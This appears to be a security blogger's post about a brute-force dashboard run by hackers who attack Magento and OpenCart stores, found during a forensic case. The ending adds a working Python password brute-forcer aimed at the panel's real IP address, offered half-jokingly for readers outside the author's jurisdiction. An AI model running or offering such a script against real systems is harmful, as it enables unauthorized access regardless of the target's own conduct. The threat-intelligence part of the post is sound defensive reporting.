An OpenCart/Magento hacking dashboard


This post shows how sophisticated Magento hacking operations have become nowadays. And a measure to counter this!

While investigating a bruteforced Magento store, I noticed that the hacker logged in using a curious referrer site:

"GET /rss/catalog/notifystock/ HTTP/1.1" 200 5676 "http://194.87.232.147:777/"

The site at http://194.87.232.147:777/ shows:

brute force dashboard

A “Magento report panel” asks for a Пароль (password), so we can’t enter. But in the page source (beautified JS here) are some clues about its evil intentions:

$.post("/home/getServers", function(n) {
$.post("/home/GetCountGoodLastDay", function(n) {
$.post("/home/GetCountServerLastDay", function(n) {
$.post("/home/GetCountSuccessLastDay", function(n) {
$.post("/home/ChangeMarkState", {
$.post("/home/ChangeComment", { 
$.post("/home/getCount", { 
$.post("/home/ChangeShell", {
$.post("/home/ChangeReservedLogins", {

Apparently somebody has built a sophisticated dashboard to manage bruteforce Magento hacking operations! It seems to show the daily progress on hacked Magento stores and it has a GUI method to mark found servers as “success”. Also, it can be used to log in to the backend of hacked stores.

I checked my forensic notes of previous cases and found that this dashboard was used in at least one other case. Sysadmins, check your server logs!

Update April 11th: Super-sleuth Len Lorijn noted that an “Opencart Report Panel” is running on the same server. This signifies that e-commerce hackers are platform agnostic. If there’s money flowing through it, it’s worth hacking.

Returning the favour

I wonder if the culprit has bruteforce protection on his own management panel. Wouldn’t it be a nice gesture if the bruteforcer got bruteforced? Now, I won’t do that, as it is not allowed in my country. But if you happen to live in a place where that is not the case (anyone from Belize?), you could use something like this (educational disclaimer, yadie yada):

#!/usr/bin/env python3
""" 
Brute force the admin password
of a Russian brute forcer's admin panel
"""

import requests
URL = 'http://194.87.232.147:777/Account/Login'

print("Downloading Russian wordlist...")
wordlist = requests.get('https://github.com/svetlitskiy/wordlist-russian/blob/master/russian-words.json?raw=true').json()

for word in wordlist:
	print("Trying {}".format(word.encode('utf-8')))
	resp = requests.post(URL, data=dict(Password=word))
	if resp.status_code == 200 and 'form action="/Account/Login"' not in resp.content:
		print("{} looks good!".format(word.encode('utf-8')))
		break

In Dutch we have a very applicable saying:

een koekje van eigen deeg

which translates to

give someone a cookie from his own dough

Hacked store? Hire me! And get updated on new posts via Twitter: